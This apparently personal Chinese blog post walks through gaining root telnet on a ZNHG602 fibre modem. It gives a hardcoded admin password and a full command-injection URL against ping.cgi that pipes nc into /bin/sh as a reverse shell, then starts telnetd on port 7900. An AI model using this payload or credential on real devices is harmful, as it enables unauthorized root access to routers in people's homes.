1. 程式人生 > 其它 >兆能ZNHG602破解telnet

兆能ZNHG602破解telnet

前幾天辦了新寬頻,電信又拿了個新品牌的光貓,看背面寫的是兆能(好吧不認識T_T)

按照慣例開啟192.168.1.1:8080 介面,結果自動跳到了新luci介面。用慣用手段獲取密碼:(小提示:在80介面密碼欄直接輸入nE7jA%5m即可登入8080,無需修改使用者名稱)

開啟ftp連線光貓,顯示Pure_Ftpd(挺先進),用useradmin登入,看到了熟悉的romfile,下載到電腦發現沒有加密!正當我激動之時發現裡面並沒有telnet設定……通過一番尋找找到8080埠的網頁在/usr/share/web下,找到了ftpandTelnet.cgi這個檔案,但用瀏覽器訪問是,電信直接封死了……有關備份和更新的也同樣被封死。。。那就只能通過其他方式了。

0.ftp:通過四處尋找指令碼發現/var下有Speedtest指令碼,可能是手機端測速功能的後端,ftp上傳一個反彈shell指令碼上去,但手機上點測速並沒有效果,而且登入回去發現檔案並未被修改。可能ftpd有許可權設定/系統只讀但運用了overlay

1.ttl:光貓後螺絲只上了兩個螺絲,另外一側是卡上去的(好省錢……),用一把尺子輕鬆拆開。正面有幾塊黑膠,拆開後底下有熟悉的四個觸點,還貼心的標上了TX RX,明擺著讓你用呢!但putty連上後失望了,需要登入。用e8c和useradmin/admin都顯示error,方法不通。

2.網頁漏洞:(1)起初以為telnet服務是啟動的(nmap顯示23埠是filtered),在luci頁面中埠對映127.0.0.1:23至127.0.0.1:23開啟23埠,telnet連線後是連線重置……壓根telnetd就沒起來!

(2)在8080頁面有ping.cgi,輸入127.0.0.1測試後連結變成了http://192.168.1.1:8080/ping.cgi?diagIntfT=nas0.46&diagAddrT=127.0.0.1&diagTestTypeT=1&ippingversionT=4&repiNum=1&submit=1,關鍵點:addr可修改!修改地址為diagAddrT=127.0.0.1|ls後並沒有出現報錯,顯示內容正常!直接執行telnetd經過實驗什麼都沒有發生……在視窗看不到錯誤原因,因此可以嘗試尋找可以反彈shell的工具。通過which nc找到nc。嘗試直接用nc -e /bin/sh反彈 果不其然沒有-e選項。因此用

http://192.168.1.1:8080/ping.cgi?diagIntfT=nas0.46&diagAddrT=&nc 192.168.1.2 8080|/bin/sh|nc 192.168.1.2 8081&diagTestTypeT=1&ippingversionT=4&repiNum=1&submit=1成功反彈出shell,但60s後會報錯且無法連線,顯然不是我們的目的。在nc中再次執行telnetd -l /bin/login 後成功,但telnet依舊無法連線。發現光貓有upnp功能,因此7900埠可能是開放,因此修改命令為telnetd -l /bin/login -p 7900,終於能連通。login處useradmin和密碼成功登入且為root許可權!至此破解telnet結束。

(提供一個不需要nc直接網頁訪問就能開啟telnet的連結:連結)

仍需解決的問題:1.在dev下發現mtd*,但通過mount不能找到根目錄具體是mtd幾,根目錄應該是squashfs,但dd提取出的映象在linux下不能直接掛載和binwalk提取。

2.配置檔案真實路徑為/var/pdm/config.xml,但直接修改後重啟會恢復原樣,而且/var無法判斷是squashfs還是單純的tmpfs。/var/rdm下還有另外的配置檔案,但貌似有加密無法解讀。